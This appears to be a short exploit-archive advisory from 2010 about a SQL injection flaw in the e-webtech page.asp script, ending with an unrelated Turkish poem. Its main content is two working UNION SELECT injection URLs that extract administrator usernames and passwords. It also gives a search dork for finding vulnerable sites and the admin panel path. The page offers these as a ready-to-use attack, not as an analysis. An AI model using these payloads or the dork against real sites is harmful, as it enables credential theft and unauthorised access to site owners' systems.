[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : e-webtech (page.asp) SQL Injection Vulnerability
# Published : 2010-05-11
# Author : CoBRa_21
# Previous Title : Uploader v0.1.5 Multiple Vulnerabilities
# Next Title : Free Advertisment cms (user_info.php) SQL Injection Vulnerability


-------------------------------------------------------------------------------------------
 
e-webtech (page.asp) SQL Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Name: e-webtech
 
Dork: "Powerd by www.e-webtech.com"

-------------------------------------------------------------------------------------------
 
User Exploit:
 
http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword
 
Password Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword

Administartor Panel:

http://localhost/[path]/controlpanel/

-------------------------------------------------------------------------------------------

?yle bir ?zlemişim ki seni
Artık d?nsen de olur d?nmesen de
Ben her daim yine sana sitemli yine sana hasret giderim
Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
Dağları deviriverdin üstüme hi? ?ekinmedin
Ben bu şehirde bir daha da sabah g?rmedim
Günaydınlar olmadı günler aymadı sensiz ........

-------------------------------------------------------------------------------------------